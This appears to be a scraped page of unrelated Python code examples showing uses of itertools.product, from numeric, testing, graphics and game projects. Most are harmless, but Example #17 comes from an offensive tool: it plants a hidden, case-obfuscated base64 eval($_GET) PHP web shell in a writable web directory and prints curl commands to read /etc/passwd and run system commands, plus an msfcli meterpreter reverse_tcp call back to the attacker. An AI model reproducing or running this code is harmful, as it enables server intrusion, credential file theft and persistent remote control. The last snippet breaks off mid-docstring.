def resolve(self):
        # Sort the guesses by score so the possible keys can be built from the guess with the lowest score
        self.__guesses = sorted(self.__guesses, key=lambda guess: guess[len(guess) - 1])

        # First of all, check feasibility by comparing the matches between pairs
        # of guesses; this is the fastest way to prove that no key is possible
        if not self.__checkIfPossibleByPairs():
            return "No"

        # Get the possible keys. mainKeys holds the keys most likely to match,
        # because they include all the numbers that appear in the different guesses;
        # possibleKeys holds the remaining keys built from numbers that cannot be discarded
        mainKeys, possibleKeys = self.__createPossibleKeys(self.__guesses)

        # Check the keys with most posibilities
        for key in itertools.product(*mainKeys):
            if self.__checkIfPossibleWithGuesses(key):
                return "Yes"

        # Check the rest; this is the brute-force method :'(
        for key in itertools.product(*possibleKeys):
            if self.__checkIfPossibleWithGuesses(key):
                return "Yes"

        # No key matches, no hope left :'(
        return "No"
Example #2
def _generate_cmdline_tests():
    """Generate testcases for test_split_binding."""
    # pylint: disable=invalid-name
    TestCase = collections.namedtuple('TestCase', 'cmd, valid')
    separators = [';;', ' ;; ', ';; ', ' ;;']
    invalid = ['foo', '']
    valid = ['leave-mode', 'hint all']
    # Valid command only -> valid
    for item in valid:
        yield TestCase(''.join(item), True)
    # Invalid command only -> invalid
    for item in invalid:
        yield TestCase(''.join(item), False)
    # Invalid command combined with invalid command -> invalid
    for item in itertools.product(invalid, separators, invalid):
        yield TestCase(''.join(item), False)
    # Valid command combined with valid command -> valid
    for item in itertools.product(valid, separators, valid):
        yield TestCase(''.join(item), True)
    # Valid command combined with invalid command -> invalid
    for item in itertools.product(valid, separators, invalid):
        yield TestCase(''.join(item), False)
    # Invalid command combined with valid command -> invalid
    for item in itertools.product(invalid, separators, valid):
        yield TestCase(''.join(item), False)
    # Command with no_cmd_split combined with an "invalid" command -> valid
    for item in itertools.product(['bind x open'], separators, invalid):
        yield TestCase(''.join(item), True)
Example #3
def p_player_skill_given_data(player, skill):
    bingame_outcomes = itertools.product(OUTCOMES, repeat=N_GAME_TYPES)
    other_player_skills = itertools.product(SKILLS, repeat=N_PLAYERS - 1)
    # Materialize the combinations: product returns a one-shot iterator,
    # and the original name `all` shadowed the builtin.
    combos = list(itertools.product(bingame_outcomes, other_player_skills))

    def player_a_skill_and_data(s):
        return sum(p_skill_and_data(outcomes, (s, s_b, s_c, s_d))
                   for outcomes, (s_b, s_c, s_d) in combos)

    def player_b_skill_and_data(s):
        return sum(p_skill_and_data(outcomes, (s_a, s, s_c, s_d))
                   for outcomes, (s_a, s_c, s_d) in combos)

    def player_c_skill_and_data(s):
        return sum(p_skill_and_data(outcomes, (s_a, s_b, s, s_d))
                   for outcomes, (s_a, s_b, s_d) in combos)

    def player_d_skill_and_data(s):
        return sum(p_skill_and_data(outcomes, (s_a, s_b, s_c, s))
                   for outcomes, (s_a, s_b, s_c) in combos)

    if player == PLAYER_A:
        return player_a_skill_and_data(skill) / P_DATA
    elif player == PLAYER_B:
        return player_b_skill_and_data(skill) / P_DATA
    elif player == PLAYER_C:
        return player_c_skill_and_data(skill) / P_DATA
    elif player == PLAYER_D:
        return player_d_skill_and_data(skill) / P_DATA
    else:
        return 0
Example #4
File: test_loc.py Project: bwignall/pandas
    def test_loc_getitem_int_slice(self):
        # GH 3053
        # loc should treat integer slices like label slices

        index = MultiIndex.from_tuples([t for t in itertools.product(
            [6, 7, 8], ['a', 'b'])])
        df = DataFrame(np.random.randn(6, 6), index, index)
        result = df.loc[6:8, :]
        expected = df
        tm.assert_frame_equal(result, expected)

        index = MultiIndex.from_tuples([t
                                        for t in itertools.product(
                                            [10, 20, 30], ['a', 'b'])])
        df = DataFrame(np.random.randn(6, 6), index, index)
        result = df.loc[20:30, :]
        expected = df.iloc[2:]
        tm.assert_frame_equal(result, expected)

        # doc examples
        result = df.loc[10, :]
        expected = df.iloc[0:2]
        expected.index = ['a', 'b']
        tm.assert_frame_equal(result, expected)

        result = df.loc[:, 10]
        expected = df[10]
        tm.assert_frame_equal(result, expected)
Example #5
    def get_similarity(self, string1, string2):
        """
        Calculate the similarity of two statements.
        This is based on the total similarity between
        each word in each sentence.
        """
        import itertools

        tokens1 = self.get_tokens(string1)
        tokens2 = self.get_tokens(string2)

        total_similarity = 0

        # Get the highest matching value for each possible combination of words
        for combination in itertools.product(*[tokens1, tokens2]):

            synset1 = self.wordnet.synsets(combination[0])
            synset2 = self.wordnet.synsets(combination[1])

            if synset1 and synset2:

                max_similarity = 0

                # Get the highest similarity for each combination of synsets
                for synset in itertools.product(*[synset1, synset2]):
                    similarity = synset[0].path_similarity(synset[1])

                    if similarity and (similarity > max_similarity):
                        max_similarity = similarity

                # Add the most similar path value to the total
                total_similarity += max_similarity

        return total_similarity
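The nested products above boil down to: score every word pair, and within each pair every synset pair, keeping the best synset score. A dependency-free sketch with a stand-in similarity function (toy_similarity is hypothetical; the original uses WordNet's path_similarity):

import itertools

def toy_similarity(w1, w2):
    # Stand-in for WordNet path_similarity: Jaccard overlap of letters.
    union = set(w1) | set(w2)
    return len(set(w1) & set(w2)) / len(union) if union else 0.0

def total_similarity(tokens1, tokens2):
    total = 0.0
    for w1, w2 in itertools.product(tokens1, tokens2):
        total += toy_similarity(w1, w2)
    return total

print(total_similarity(["cat", "dog"], ["cart", "log"]))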
Example #6
 def test_header_scaling(self):
     # For images that implement scaling, test effect of scaling
     #
     # This tests the effect of creating an image with a header containing
     # the scaling, then writing the image and reading again.  So the scaling
     # can be affected by the processing of the header when creating the
     # image, or by interpretation of the scaling when creating the array.
     #
     # Analyze does not implement any scaling, but this test class is the
     # base class for all Analyze-derived classes, such as NIfTI
     img_class = self.image_class
     hdr_class = img_class.header_class
     if not hdr_class.has_data_slope:
         return
     arr = np.arange(24, dtype=np.int16).reshape((2, 3, 4))
     invalid_slopes = (0, np.nan, np.inf, -np.inf)
     for slope in (1,) + invalid_slopes:
         self.assert_null_scaling(arr, slope, None)
     if not hdr_class.has_data_intercept:
         return
     invalid_inters = (np.nan, np.inf, -np.inf)
     invalid_pairs = tuple(itertools.product(invalid_slopes, invalid_inters))
     bad_slopes_good_inter = tuple(itertools.product(invalid_slopes, (0, 1)))
     good_slope_bad_inters = tuple(itertools.product((1, 2), invalid_inters))
     for slope, inter in (invalid_pairs + bad_slopes_good_inter +
                          good_slope_bad_inters):
         self.assert_null_scaling(arr, slope, inter)
Example #7
def Process():
    
    for thisXConfiguration in product(range(MAX_X_CARDINALITY), repeat = BASE_CYCLE_SIZE):
        
        baseGraph = make_cycle(7)
        baseGraph, x_sets = ConstructGraph(thisXConfiguration, baseGraph)
        thisGraph = deepcopy(baseGraph)
        print(thisGraph.edges())
        #Try all possible combos of X and X_i+2 edges
        for xSetIndex in range(0,BASE_CYCLE_SIZE):
            s1 = x_sets[xSetIndex]
            s2 = x_sets[(xSetIndex + 2) % BASE_CYCLE_SIZE]
        
            for i in range(0,4):
                for thisEdgeCombo in combinations(product(s1,s2),i):
                    for thisEdge in thisEdgeCombo:
                        thisGraph.add_edge(thisEdge[0], thisEdge[1])      
                         
                    WriteToLogFile(FinalProcessGraph(thisGraph))
                
                    #for each of these combos, try it with all combos of X and X_i+5
                    thisGraphMoreJoins = deepcopy(thisGraph)
                    s1 = x_sets[xSetIndex]
                    s2 = x_sets[(xSetIndex + 5) % BASE_CYCLE_SIZE]
                    for i in range(0,4):
                        for thisEdgeCombo in combinations(product(s1,s2),i):
                            for thisEdge in thisEdgeCombo:
                                thisGraphMoreJoins.add_edge(thisEdge[0], thisEdge[1])      
                             
                            WriteToLogFile(FinalProcessGraph(thisGraphMoreJoins))
                    
                thisGraph = deepcopy(baseGraph)
                
        baseGraph.clear()
    return
Example #8
File: models.py Project: plopp/friendlysam
    def advance(self):
        if self.horizon < self.step:
            msg = '{}: horizon {} is smaller than step size {}'.format(
                repr(self),
                self.horizon,
                self.step)
            raise fs.InsanityError(msg)

        opt_times = self.times(self.time, self.horizon)

        parts = self.descendants_and_self

        if self.require_cost is True:
            cost_contributors = parts
        else:
            cost_contributors = filter(self.require_cost, parts)
        system_cost = fs.Sum(p.cost(t) for p, t in product(cost_contributors, opt_times))

        problem = fs.Problem()
        problem.objective = fs.Minimize(system_cost)
        problem += (p.constraints.make(t) for p, t in product(parts, opt_times))

        solution = self.solver.solve(problem)

        for p, t in product(parts, self.iter_times(self.time, self.step)):
            for v in p.state_variables(t):
                v.take_value(solution)

        self.time = self.step_time(self.time, self.step)
Example #9
def getThresholdColor(img2):
	img=img2.copy()
	XX=8
	YY=int(XX*float(img.size[1])/float(img.size[0]))
	img.thumbnail((XX,YY),Image.ANTIALIAS)
	img=img.convert('LA')
	pixels=img.load()
	thres=np.zeros((2,2))
	lst1=[pixels[i,j][0] for (i,j) in itertools.product(range(XX//2),range(YY//2)) ]
	lst2=[pixels[i,j][0] for (i,j) in itertools.product(range(XX//2,XX),range(YY//2)) ]
	lst3=[pixels[i,j][0] for (i,j) in itertools.product(range(XX//2),range(YY//2,YY)) ]
	lst4=[pixels[i,j][0] for (i,j) in itertools.product(range(XX//2,XX),range(YY//2,YY)) ]

	thres[0,0]=(max(lst1)-min(lst1))/10.0+2.0
	thres[1,0]=(max(lst2)-min(lst2))/10.0+2.0
	thres[0,1]=(max(lst3)-min(lst3))/10.0+2.0
	thres[1,1]=(max(lst4)-min(lst4))/10.0+2.0
	
	"""
	lst=[pixels[i,j][0] for (i,j) in itertools.product(range(XX/2),range(YY/2)) ]
	thr=(max(lst)-min(lst))/10.0
	thres[0,0]=thr
	thres[0,1]=thr
	thres[1,0]=thr
	thres[1,1]=thr
	"""
	return thres
Example #10
File: physics.py Project: RyanED/bravo
    def add_sponge(self, w, x, y, z):
        # Track this sponge.
        self.sponges[x, y, z] = True

        # Destroy the water! Destroy!
        for coords in product(
            xrange(x - 2, x + 3),
            xrange(max(y - 2, 0), min(y + 3, 128)),
            xrange(z - 2, z + 3),
            ):
            try:
                target = w.sync_get_block(coords)
                if target == self.spring:
                    if (coords[0], coords[2]) in self.springs:
                        del self.springs[coords[0],
                            coords[2]]
                    w.sync_destroy(coords)
                elif target == self.fluid:
                    w.sync_destroy(coords)
            except ChunkNotLoaded:
                pass

        # And now mark our surroundings so that they can be
        # updated appropriately.
        for coords in product(
            xrange(x - 3, x + 4),
            xrange(max(y - 3, 0), min(y + 4, 128)),
            xrange(z - 3, z + 4),
            ):
            if coords != (x, y, z):
                self.new.add(coords)
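The same three-range product is a generic way to sweep a cubic neighborhood; a standalone Python 3 sketch (range replaces the snippet's Python 2 xrange, and the world-height bounds are assumptions):

from itertools import product

def neighborhood(x, y, z, radius, y_min=0, y_max=128):
    # Every coordinate within `radius` blocks of (x, y, z),
    # with the y axis clamped to the world's height limits.
    return product(
        range(x - radius, x + radius + 1),
        range(max(y - radius, y_min), min(y + radius + 1, y_max)),
        range(z - radius, z + radius + 1),
    )

print(len(list(neighborhood(0, 64, 0, 2))))  # 5 * 5 * 5 = 125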
Example #11
    def __sample__(self):
        """
        Assigns colors to the population of graphs.
        """
        sample = dict()
        children = list(itertools.product(self.dependencies[None], [None]))

        while len(children) > 0:
            # current[1] is the parent; current[0] is the child
            current = children[0]  # first child in the list

            probs = []
            if current[1] not in sample:
                for color in self.palette:
                    probs.append(self._bbn_functions[current[0]](color))
            else:
                _product = itertools.product(self.palette, sample[current[1]])
                raise NameError('implement me!')

            sample[current[0]] = np.random.choice(self.palette, size=self.population_size, replace=True, p=probs)
            children.remove(current)

        # rotates the dictionary
        sample = TreeMIMIC.__rotate_dict__(sample, dict_to_list=True)

        for graph, colors in itertools.izip(self.population, sample):
            graph.colors = colors
Example #12
 def translations(self, hft):
   """ Array of permutations arising from pure translations """
   from itertools import product
   from numpy import zeros
   nsites = len(self.dnt[0])
   itertrans = [ xrange(hft.quotient[0]), 
                 xrange(hft.quotient[1]), 
                 xrange(hft.quotient[2]) ] 
   size = hft.size
   result = zeros((size-1, nsites * size), dtype='int16')  - 1
   iterable = product(*itertrans)
   a = iterable.next() # avoid null translation
   assert a == (0,0,0) # check that it is null
   for t, (i,j,k) in enumerate(iterable):
     iterpos = [ xrange(hft.quotient[0]), 
                 xrange(hft.quotient[1]), 
                 xrange(hft.quotient[2]) ] 
     for l, m, n in product(*iterpos):
       u = (i+l) % hft.quotient[0]
       v = (j+m) % hft.quotient[1]
       w = (k+n) % hft.quotient[2]
       for s in xrange(nsites):
         result[t, hft.flatten_indices(l, m, n, s)]                           \
             = hft.flatten_indices(u, v, w, s)
   return result
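The double product over hft.quotient is a walk over a 3D periodic grid; a small Python 3 sketch of the wrap-around index mapping with a toy 2x2x2 quotient (the hft object itself is not reproduced):

from itertools import product

quotient = (2, 2, 2)

# For each translation t = (i, j, k), map every site (l, m, n)
# to its translated image (u, v, w) with periodic wrap-around.
translations = {}
for i, j, k in product(*(range(q) for q in quotient)):
    if (i, j, k) == (0, 0, 0):
        continue  # skip the null translation, as the snippet does
    translations[(i, j, k)] = {
        (l, m, n): ((i + l) % quotient[0],
                    (j + m) % quotient[1],
                    (k + n) % quotient[2])
        for l, m, n in product(*(range(q) for q in quotient))
    }

print(translations[(1, 0, 0)][(1, 1, 1)])  # (0, 1, 1)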
Example #13
    def entropy(self, n, p):
        # Note that given n and p where p is a probability vector of
        # length k, the entropy requires a sum over all
        # possible configurations of a k-vector which sums to n. It's
        # expensive.
        # http://stackoverflow.com/questions/36435754/generating-a-numpy-array-with-all-combinations-of-numbers-that-sum-to-less-than
        sess = tf.Session()
        n = sess.run(tf.cast(tf.squeeze(n), dtype=tf.int32))
        sess.close()
        p = tf.cast(tf.squeeze(p), dtype=tf.float32)
        if isinstance(n, np.int32):
            k = get_dims(p)[0]
            max_range = np.zeros(k, dtype=np.int32) + n
            x = np.array([i for i in product(*(range(i+1) for i in max_range))
                                 if sum(i)==n])
            logpmf = self.logpmf(x, n, p)
            return tf.reduce_sum(tf.mul(tf.exp(logpmf), logpmf))
        else:
            out = []
            for j in range(n.shape[0]):
                k = get_dims(p)[0]
                max_range = np.zeros(k, dtype=np.int32) + n[j]
                x = np.array([i for i in product(*(range(i+1) for i in max_range))
                                     if sum(i)==n[j]])
                logpmf = self.logpmf(x, n[j], p[j, :])
                out += [tf.reduce_sum(tf.mul(tf.exp(logpmf), logpmf))]

            return tf.pack(out)
Example #14
def main():
    """ Generate tests """
    dirname = os.path.join('spec', 'glsl-1.20', 'execution')
    utils.safe_makedirs(dirname)


    for c, r in itertools.product(range(2, 5), repeat=2):
        vecs = [
            Parameters(c, r, 'vec', 'mat{0}x{1}'.format(r, c)),
            Parameters(c, r, 'ivec', 'mat{0}x{1}'.format(r, c))
        ]
        if r == c:
            vecs.extend([
                Parameters(c, r, 'vec', 'mat{0}'.format(r)),
                Parameters(c, r, 'ivec', 'mat{0}'.format(r))
            ])

        stages = ['vs', 'fs']
        types = ['const', 'uniform']
        for shader, type_, params in itertools.product(stages, types, vecs):
            name = os.path.join(
                dirname,
                '{shader}-outerProduct-{type}{mat}{vec}.shader_test'.format(
                    shader=shader,
                    type='const-' if type_ == 'const' else '',
                    mat=params.matrix,
                    vec='-ivec' if params.vec_type == 'ivec' else ''))

            print(name)
            with open(name, 'w+') as f:
                f.write(TEMPLATE.render_unicode(params=params,
                                                type=type_,
                                                shader=shader))
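For reference, product(range(2, 5), repeat=2) walks every (columns, rows) pair from 2x2 up to 4x4, so nine matrix shapes are generated:

import itertools
print(list(itertools.product(range(2, 5), repeat=2)))
# [(2, 2), (2, 3), (2, 4), (3, 2), (3, 3), (3, 4), (4, 2), (4, 3), (4, 4)]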
Example #15
def answer(matrix):
    n = len(matrix)
    if n % 2 == 0:
        rev = [[0] * n for i in range(n)]
        for i,j in product(range(n),repeat=2):
            if matrix[i][j]:
                for k in range(n):
                    rev[k][j] = rev[k][j] ^ 1
                    rev[i][k] = rev[i][k] ^ 1
                rev[i][j] = rev[i][j] ^ 1
        return sum([sum(row) for row in rev])
    elif validate(matrix):
        condition = True
        for i,j in product(range(n),repeat=2):
            if i == j or i == n - 1 or j == n - 1:
               if matrix[i][j] == 0:
                   condition = False
                   break
            elif matrix[i][j]:
                condition = False
                break
        if condition:
            return n
        return sum([sum(row) for row in matrix])
    else:
        return -1
Example #16
    def test_slice_passing(self):
        """
        Check passing a slice object to a Numba function.
        """
        # NOTE this also checks slice attributes
        def check(a, b, c, d, e, f):
            sl = slice(a, b, c)
            got = cfunc(sl)
            self.assertPreciseEqual(got, (d, e, f))

        maxposint = sys.maxsize
        maxnegint = -maxposint - 1
        cfunc = jit(nopython=True)(slice_passing)

        # Positive steps
        start_cases = [(None, 0), (42, 42), (-1, -1)]
        stop_cases = [(None, maxposint), (9, 9), (-11, -11)]
        step_cases = [(None, 1), (12, 12)]
        for (a, d), (b, e), (c, f) in itertools.product(start_cases,
                                                        stop_cases,
                                                        step_cases):
            check(a, b, c, d, e, f)

        # Negative steps
        start_cases = [(None, 0), (42, 42), (-1, -1)]
        stop_cases = [(None, maxnegint), (9, 9), (-11, -11)]
        step_cases = [(-1, -1), (-12, -12)]
        for (a, d), (b, e), (c, f) in itertools.product(start_cases,
                                                        stop_cases,
                                                        step_cases):
            check(a, b, c, d, e, f)

        # Some member is neither integer nor None
        with self.assertRaises(TypeError):
            cfunc(slice(1.5, 1, 1))
Example #17
    def php(self, ip, ourIP):
        wwwroot = linux.get_doc_root()
        cmd = 'find {0} -depth -perm -0002 -type d | sort -R '.format(wwwroot)
        folder = make_request.get_page_source(cmd)
        if folder:
            folder = folder[0]
            cprint('\n[+] Found a writable directory: \'{0}\''.format(folder), 'green')
            filename = '.' + ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) + '.php'
            cprint('[+] Filename: \'{0}\''.format(filename), 'green')
            location = '{0}/{1}'.format(folder, filename)

            cmd = 'find {0} -type f -print'.format(wwwroot)
            files = make_request.get_page_source(cmd)
            cprint('[i] Select a file to \'clone\' (or \'0\' to skip):', 'green')
            cprint(' 0.) Don\'t clone - create new', 'green')
            path = []
            c = 0
            for file in files:
                path.append(file)
                c += 1
                cprint('{0:2d}.) {1}'.format(c, file), 'green')
            while True:
                try:
                    clone = int(raw_input(colored('[>] Which file to use? [0-{0}]: '.format(c))))
                    if 0 <= clone <= c:
                        break
                except ValueError:
                    pass

            if clone != 0:
                cmd = 'cp -f {0} {1}'.format(path[int(clone) - 1], location)
                make_request.get_page_source(cmd)
            cprint('[+] Creating our \'evil\' file: \'{0}\''.format(location), 'green')
            parameter = ''.join(choice(string.ascii_lowercase) for x in range(6))
            casePayload = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'eval'))))
            caseShell = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'php eval(base64_decode'))))
            payload = "{0}($_GET['{1}'].';');".format(casePayload, parameter)
            payloadEncoded = b64encode(payload)
            evilFile = "<?{0}(\"{1}\")); ?>".format(caseShell, payloadEncoded)
            cmd = 'echo \'{0}\' >> \"{1}\"'.format(evilFile, location)
            make_request.get_page_source(cmd)
            cprint('[+] Done!', 'blue')
            uri = folder[len(wwwroot):]

            #>>> '/'.join('https://localhost/html/shell.php'.split('/', 3)[:3])
            #'https://localhost'
            url = '/'.join(getargs.url.split('/', 3)[:3])
            example = """Example:
            curl "{url}{uri}/{filename}?{parameter}=phpinfo()"
            curl "{url}{uri}/{filename}?{parameter}=require(\'/etc/passwd\')"
            curl "{url}{uri}/{filename}?{parameter}=system(\'/sbin/ifconfig\')"
            msfcli exploit/unix/webapp/php_eval RHOST={url} RPORT=80 PHPURI={uri}/{filename}?{parameter}=\!CODE\! PAYLOAD=php/meterpreter/reverse_tcp LHOST={ourIP} LPORT=4444 E""".format(
                    url=url,
                    uri=uri,
                    filename=filename,
                    parameter=parameter,
                    ourIP=ourIP,)
            cprint(example, 'green')
        else:
            cprint('\n[!] Unable to find a writable directory', 'red')
Example #18
 def _annotate_values(self, element):
     axis = self.handles['axis']
     val_dim = element.vdims[0]
     d1keys, d2keys = element.dense_keys()
     vals = np.rot90(element.raster, 3).flatten()
     d1uniq, d2uniq = [np.unique(element.dimension_values(i)) for i in range(2)]
     num_x, num_y = len(d1uniq), len(d2uniq)
     xstep, ystep = 1.0/num_x, 1.0/num_y
     xpos = np.linspace(xstep/2., 1.0-xstep/2., num_x)
     ypos = np.linspace(ystep/2., 1.0-ystep/2., num_y)
     plot_coords = product(xpos, ypos)
     for plot_coord, v in zip(plot_coords, vals):
         text = val_dim.pprint_value(v)
         text = '' if v is np.nan else text
         if plot_coord not in self.handles['annotations']:
             annotation = axis.annotate(text, xy=plot_coord,
                                        xycoords='axes fraction',
                                        horizontalalignment='center',
                                        verticalalignment='center')
             self.handles['annotations'][plot_coord] = annotation
         else:
             self.handles['annotations'][plot_coord].set_text(text)
     old_coords = set(self.handles['annotations'].keys()) - set(product(xpos, ypos))
     for plot_coord in old_coords:
         annotation = self.handles['annotations'].pop(plot_coord)
         annotation.remove()
Example #19
    def test_pdist(self):
        for metric, argdict in self.scipy_metrics.iteritems():
            keys = argdict.keys()
            for vals in itertools.product(*argdict.values()):
                kwargs = dict(zip(keys, vals))
                D_true = pdist(self.X1, metric, **kwargs)
                Dsq_true = squareform(D_true)
                dm = DistanceMetric(metric, **kwargs)
                for X in self.X1, self.spX1:
                    yield self.check_pdist, metric, X, dm, Dsq_true, True

                for X in self.X1, self.spX1:
                    yield self.check_pdist, metric, X, dm, D_true, False

        for rmetric, (metric, func) in self.reduced_metrics.iteritems():
            argdict = self.scipy_metrics[metric]
            keys = argdict.keys()
            for vals in itertools.product(*argdict.values()):
                kwargs = dict(zip(keys, vals))
                D_true = func(pdist(self.X1, metric, **kwargs),
                              **kwargs)
                Dsq_true = squareform(D_true)
                dm = DistanceMetric(rmetric, **kwargs)
                for X in self.X1, self.spX1:
                    yield self.check_pdist, rmetric, X, dm, Dsq_true, True

                for X in self.X1, self.spX1:
                    yield self.check_pdist, rmetric, X, dm, D_true, False
Example #20
def test_state_reconciliation_no_ops():
  # active vs. active
  for st0, st1 in product(THERMOS_LIVES, LIVE_STATES):
    tgc, driver = make_pair({'foo': st0}, {})
    lgc, rgc, updates = tgc.reconcile_states(driver, {'foo': st1})
    assert tgc.len_results == (0, 0, 0, 0)
    assert llen(lgc, rgc, updates) == (0, 0, 0)

  # terminal vs. terminal
  for st0, st1 in product(THERMOS_TERMINALS, TERMINAL_STATES):
    tgc, driver = make_pair({}, {'foo': st0})
    lgc, rgc, updates = tgc.reconcile_states(driver, {'foo': st1})
    assert tgc.len_results == (0, 0, 0, 0)
    assert llen(lgc, rgc, updates) == (0, 0, 0)

  # active vs. starting
  for st0, st1 in product(THERMOS_LIVES, STARTING_STATES):
    tgc, driver = make_pair({'foo': st0}, {})
    lgc, rgc, updates = tgc.reconcile_states(driver, {'foo': st1})
    assert tgc.len_results == (0, 0, 0, 0)
    assert llen(lgc, rgc, updates) == (0, 0, 0)

  # nexist vs. starting
  for st1 in STARTING_STATES:
    tgc, driver = make_pair({}, {})
    lgc, rgc, updates = tgc.reconcile_states(driver, {'foo': st1})
    assert tgc.len_results == (0, 0, 0, 0)
    assert llen(lgc, rgc, updates) == (0, 0, 0)
Example #21
    def test_integers_to_negative_integer_power(self):
        # Note that the combination of uint64 with a signed integer
        # has common type np.float64. The other combinations should all
        # raise a ValueError for integer ** negative integer.
        exp = [np.array(-1, dt)[()] for dt in 'bhilq']

        # 1 ** -1 possible special case
        base = [np.array(1, dt)[()] for dt in 'bhilqBHILQ']
        for i1, i2 in itertools.product(base, exp):
            if i1.dtype != np.uint64:
                assert_raises(ValueError, operator.pow, i1, i2)
            else:
                res = operator.pow(i1, i2)
                assert_(res.dtype.type is np.float64)
                assert_almost_equal(res, 1.)

        # -1 ** -1 possible special case
        base = [np.array(-1, dt)[()] for dt in 'bhilq']
        for i1, i2 in itertools.product(base, exp):
            if i1.dtype != np.uint64:
                assert_raises(ValueError, operator.pow, i1, i2)
            else:
                res = operator.pow(i1, i2)
                assert_(res.dtype.type is np.float64)
                assert_almost_equal(res, -1.)

        # 2 ** -1 perhaps generic
        base = [np.array(2, dt)[()] for dt in 'bhilqBHILQ']
        for i1, i2 in itertools.product(base, exp):
            if i1.dtype != np.uint64:
                assert_raises(ValueError, operator.pow, i1, i2)
            else:
                res = operator.pow(i1, i2)
                assert_(res.dtype.type is np.float64)
                assert_almost_equal(res, .5)
Example #22
File: sdsirec.py Project: Loveice/FPsolve
def gen_system_free() :
  # for all pairs i, j in range

  #generate equation for all pairs of persons e.g. <Trust_A_B> ::= "AB" | <Trust_A_C> <Trust_C_B> | ...
  for i,j in itertools.product(range(len(persons)),repeat=2) :
    joinpairs = ["<Trust_" + persons[i] + "_" + persons[x] + ">" + " <Trust_" + persons[x] + "_" + persons[j] + "> " for x in range(len(persons))]
    body = ""
    if len(joinpairs) > 0 :
      body = reduce(lambda x,y: x + " | " + y, joinpairs if trust.has_key((i,j)) else joinpairs[1:], ('"' + persons[i]+ "-" + persons[j] + '"') if trust.has_key((i,j)) else joinpairs[0])
    else :
      body = ('"' + persons[i]+ "-" + persons[j] + '"') if trust.has_key((i,j)) else ""
    
    if body == "" :
      body = "0";

    eq = "<Trust_" + persons[i] + "_" + persons[j] + "> ::= " + body + ";"
    print eq

  for i,j in itertools.product(range(len(persons)),range(len(products))) :
    joinpairs = ["<Trust_" + persons[i] + "_" + persons[x] + ">" + " <Rec_" + persons[x] + "_" + products[j] + "> " for x in range(len(persons))]
    body = ""
    if len(joinpairs) > 0 :
      body = reduce(lambda x,y: x + " | " + y, joinpairs if rec.has_key((i,j)) else joinpairs[1:], ('"' + persons[i]+"-" +products[j] + '"') if rec.has_key((i,j)) else joinpairs[0])
    else :
      body = ('"' + persons[i]+ "-" +products[j] + '"') if rec.has_key((i,j)) else ""
    if body == "" :
      body = "0";

    eq = "<Rec_" + persons[i] + "_" + products[j] + "> ::= " + body + ";"
    print eq
Example #23
File: test_utils.py Project: nolta/numpy
    def test_nat_items(self):
        # not a datetime
        nadt_no_unit = np.datetime64("NaT")
        nadt_s = np.datetime64("NaT", "s")
        nadt_d = np.datetime64("NaT", "ns")
        # not a timedelta
        natd_no_unit = np.timedelta64("NaT")
        natd_s = np.timedelta64("NaT", "s")
        natd_d = np.timedelta64("NaT", "ns")

        dts = [nadt_no_unit, nadt_s, nadt_d]
        tds = [natd_no_unit, natd_s, natd_d]
        for a, b in itertools.product(dts, dts):
            self._assert_func(a, b)
            self._assert_func([a], [b])
            self._test_not_equal([a], b)

        for a, b in itertools.product(tds, tds):
            self._assert_func(a, b)
            self._assert_func([a], [b])
            self._test_not_equal([a], b)

        for a, b in itertools.product(tds, dts):
            self._test_not_equal(a, b)
            self._test_not_equal(a, [b])
            self._test_not_equal([a], [b])
            self._test_not_equal([a], np.datetime64("2017-01-01", "s"))
            self._test_not_equal([b], np.datetime64("2017-01-01", "s"))
            self._test_not_equal([a], np.timedelta64(123, "s"))
            self._test_not_equal([b], np.timedelta64(123, "s"))
Example #24
def pytest_generate_tests(metafunc):
    bsz_rng = [1]

    if 'refgruargs' in metafunc.fixturenames:
        fargs = []
        if metafunc.config.option.all:
            seq_rng = [2, 3, 4]
            inp_rng = [3, 5, 10]
            out_rng = [3, 5, 10]
        else:
            seq_rng = [3]
            inp_rng = [5]
            out_rng = [10]
        fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
        metafunc.parametrize('refgruargs', fargs)

    if 'gradgruargs' in metafunc.fixturenames:
        fargs = []
        if metafunc.config.option.all:
            seq_rng = [2, 3]
            inp_rng = [5, 10]
            out_rng = [3, 5, 10]
        else:
            seq_rng = [3]
            inp_rng = [5]
            out_rng = [10]
        fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
        metafunc.parametrize('gradgruargs', fargs)
Example #25
 def _annotate_values(self, view):
     axis = self.handles['axis']
     val_dim = view.value_dimensions[0]
     dim1_keys, dim2_keys = view.dense_keys()
     num_x, num_y = len(dim1_keys), len(dim2_keys)
     xstep, ystep = 1.0/num_x, 1.0/num_y
     xpos = np.linspace(xstep/2., 1.0-xstep/2., num_x)
     ypos = np.linspace(ystep/2., 1.0-ystep/2., num_y)
     coords = product(dim1_keys, dim2_keys)
     plot_coords = product(xpos, ypos)
     for plot_coord, coord in zip(plot_coords, coords):
         if isinstance(view, HeatMap):
             val = view._data.get(coord, np.NaN)
             val = val[0] if isinstance(val, tuple) else val
         else:
             val = view[coord]
         val = val_dim.type(val) if val_dim.type else val
         val = val[0] if isinstance(val, tuple) else val
         text = val_dim.pprint_value(val)
         text = '' if val is np.nan else text
         if plot_coord not in self.handles['annotations']:
             annotation = axis.annotate(text, xy=plot_coord,
                                        xycoords='axes fraction',
                                        horizontalalignment='center',
                                        verticalalignment='center')
             self.handles['annotations'][plot_coord] = annotation
         else:
             self.handles['annotations'][plot_coord].set_text(text)
     old_coords = set(self.handles['annotations'].keys()) - set(product(xpos, ypos))
     for plot_coord in old_coords:
         annotation = self.handles['annotations'].pop(plot_coord)
         annotation.remove()
Example #26
    def add_pair_variables(self, items):
        """Add one variable per pair of items"""

        self.x = {}

        # -- gurobi --
        if self.solver == 'gurobi':

            import gurobipy as grb

            for I, J in itertools.product(items, repeat=2):
                self.x[I, J] = self.problem.addVar(vtype=grb.GRB.BINARY)

            self.problem.update()

        # -- pulp --
        if self.solver == 'pulp':

            import pulp

            for I, J in itertools.product(items, repeat=2):
                name = "%s / %s" % (I, J)
                self.x[I, J] = pulp.LpVariable(name, cat=pulp.constants.LpBinary)

        return self
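Note that product(items, repeat=2) yields ordered pairs including the self-pairs (I, I), which is exactly what the x[I, J] dictionary above is keyed on:

import itertools

items = ["a", "b"]
print(list(itertools.product(items, repeat=2)))
# [('a', 'a'), ('a', 'b'), ('b', 'a'), ('b', 'b')]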
Example #27
File: kern.py Project: Dalar/GPy
    def prod(self, other, tensor=False):
        """
